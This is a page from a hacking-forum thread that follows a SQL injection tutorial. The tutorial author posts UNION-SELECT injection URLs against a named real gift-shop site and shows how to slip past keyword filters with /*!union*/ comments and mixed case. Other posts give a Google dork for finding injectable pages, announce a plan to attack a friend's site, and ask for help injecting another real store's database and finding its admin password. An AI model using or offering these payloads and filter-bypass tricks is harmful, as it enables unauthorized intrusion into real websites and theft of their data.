Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 34
  1. #16
    Blitz's Avatar
    Join Date
    Jun 2010
    Gender
    male
    Location
    127.0.0.1
    Posts
    4,132
    Reputation
    619
    Thanks
    5,035
    Forbidden

    You don't have permission to access /toys/games-toys-all-ages.php on this server.

    Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
    RPMWS - Custom WWW Server Server at Rainy Day - a gem of a gift shop located on Main Street in Vineyard Haven on Martha's Vineyard Port 80
    I think it banned me :c


  2. #17
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Quote Originally Posted by Blitz View Post
    I think it banned me :c
    @Blitz

    I doubt it, some sites have extra security. There are ways to bypass them that I didn't go over in the tutorial.
    Post the link here and I'll give an example, and I plan on updating this sometime soon and adding String Based Injection and WAF bypassing (what you need).

  3. #18
    Blitz's Avatar
    Join Date
    Jun 2010
    Gender
    male
    Location
    127.0.0.1
    Posts
    4,132
    Reputation
    619
    Thanks
    5,035
    Quote Originally Posted by Jamal View Post


    @Blitz

    I doubt it, some sites have extra security. There are ways to bypass them that I didn't go over in the tutorial.
    Post the link here and I'll give an example, and I plan on updating this sometime soon and adding String Based Injection and WAF bypassing (what you need).
    https://www.rainydaymv.com/toys/games...,37,38,39,40--

    was what I was working with


  4. #19
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Quote Originally Posted by Blitz View Post
    Alright, some sites like to block out certain words. Here's a few things they block...

    Union
    Select
    Concat
    Group_Concat
    Information_schema
    Table_schema

    To get around it, just comment it like so: /*!TextHere*/

    For example

    Blocked
    Code:
    https://www.rainydaymv.com/toys/games-toys-all-ages.php?id=12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
    Not blocked
    Code:
    https://www.rainydaymv.com/toys/games-toys-all-ages.php?id=-12+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
    There's still an error, so that site is fucked up, but for future reference, comment some of those words out if you get an error like that. You can also do things like case changing.

    A few more examples.

    Blocked
    Code:
    https://site.com/view_product.php?id=null+union+select+1,2,3,4,5,6--
    Not blocked
    Code:
    https://site.com/view_product.php?id=null+/*!union*/+select+1,2,3,4,5,6--
    Blocked
    Code:
    https://site.com/view_product.php?id=null+/*union*/+select+1,2,concat(table_name),4,5,6+from+information_schema.tables--
    Not Blocked
    Code:
    https://site.com/view_product.php?id=null+/*union*/+select+1,2,CoNcAt(table_name),4,5,6+from+information_schema.tables--
    If you have any questions, reply or send me a VM/PM.

  5. #20
    Reflex-'s Avatar
    Join Date
    Mar 2011
    Gender
    male
    Location
    192.168.1.01
    Posts
    6,625
    Reputation
    584
    Thanks
    2,267
    My Mood
    Dead
    Nice Job and i will totally try this out

  6. The Following User Says Thank You to Reflex- For This Useful Post:

    FUKO (10-24-2011)

  7. #21
    tHeDoCtOr46's Avatar
    Join Date
    Jun 2011
    Gender
    female
    Location
    ƈἶէყ օբ հმƈƙεɾ
    Posts
    716
    Reputation
    15
    Thanks
    106
    My Mood
    In Love
    Havij



  8. #22
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Quote Originally Posted by tHeDoCtOr46 View Post
    Havij
    Sure, you can use HaviJ, if you're fine knowing you'll never learn anything.

    HaviJ = Program that has limits
    Doing it manually = No limits, you can use your imagination and do shit a stupid fucking program can't.

    I posted this so people can learn something, not for them to use some shitty program.

  9. #23
    Krooshev's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Posts
    1,046
    Reputation
    66
    Thanks
    262
    My Mood
    Inspired
    thx for he the tut gonna fuck my friends website........

  10. #24
    Fogest's Avatar
    Join Date
    Apr 2010
    Gender
    male
    Location
    Canada, Ontario
    Posts
    3,096
    Reputation
    164
    Thanks
    10,455
    My Mood
    Amazed
    Quote Originally Posted by ricmild View Post
    thx for he the tut gonna fuck my friends website........
    Only if it's vulnerable to it.

  11. #25
    Krooshev's Avatar
    Join Date
    Nov 2010
    Gender
    male
    Posts
    1,046
    Reputation
    66
    Thanks
    262
    My Mood
    Inspired
    Quote Originally Posted by Fogest View Post


    Only if it's vulnerable to it.
    i hope so,

  12. #26
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Quote Originally Posted by ricmild View Post
    i hope so,
    You can do something like:

    Code:
    inurl:.php?id= site:https://sitename.com
    Or run a scan in Acunetix.

  13. #27
    Lmsjr1234's Avatar
    Join Date
    Mar 2011
    Gender
    male
    Location
    Under your bed
    Posts
    1,366
    Reputation
    11
    Thanks
    230
    My Mood
    Amused
    Thank you Jamal we need to make this section more active.
    My Mods
    Roulette WheelX
    No Smoke ModX
    Clear Infected ScreenX
    Colorful SmokeX
    Anywhere Bomb Defuse ModX
    Colored Knife Crosshair ModX

  14. #28
    FUKO's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Location
    PBlackout.exe /mhu
    Posts
    11,128
    Reputation
    1103
    Thanks
    3,860
    Quote Originally Posted by _MASTER View Post
    You owe me credits for my dorks you're using there man
    I'll give you a hint, starts with a k, ends with a z
    Lol, thanks for the dorks. Didn't realize where I got them from. And nice to see you here
    I'll have a mod edit them in.

  15. #29
    vnnstar's Avatar
    Join Date
    Nov 2011
    Gender
    male
    Posts
    1
    Reputation
    10
    Thanks
    0
    hi Jamal. i have a problem with this site: Shopping in Armory Square - Urban Outfitters
    This site error You don't have permission to access /main/shopping.php on this server.
    i try all TUT from you but i can show all table in database.
    Can you help me with it.
    Shopping in Armory Square - Urban Outfitters /*!union*/ select 1,CoNcAt(table_name),3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables--

  16. #30
    S|W|P's Avatar
    Join Date
    Oct 2009
    Gender
    male
    Location
    The Netherlands
    Posts
    1,742
    Reputation
    -33
    Thanks
    91
    My Mood
    Doh
    I cant find the admin control panel and i cant find the password

Page 2 of 3 FirstFirst 123 LastLast

Similar Threads

  1. WPE for Beginners (Flash Games)
    By Zededarian in forum Game Hacking Tutorials
    Replies: 9
    Last Post: 03-19-2016, 11:59 AM
  2. [TUT] How to inject mods for beginners.
    By Mr.Mackey in forum Call of Duty Modern Warfare 2 Tutorials
    Replies: 22
    Last Post: 10-20-2010, 07:23 AM
  3. best c++ tutorial for beginners!
    By WacKer in forum C++/C Programming
    Replies: 31
    Last Post: 12-05-2009, 06:30 AM
  4. For the ppl who wanted it here is Advanced SQL injection
    By h3lpless_alpaca in forum General Hacking
    Replies: 0
    Last Post: 08-07-2009, 05:39 PM
  5. KO can be sql injected
    By sf0d in forum General Game Hacking
    Replies: 2
    Last Post: 01-26-2006, 09:50 PM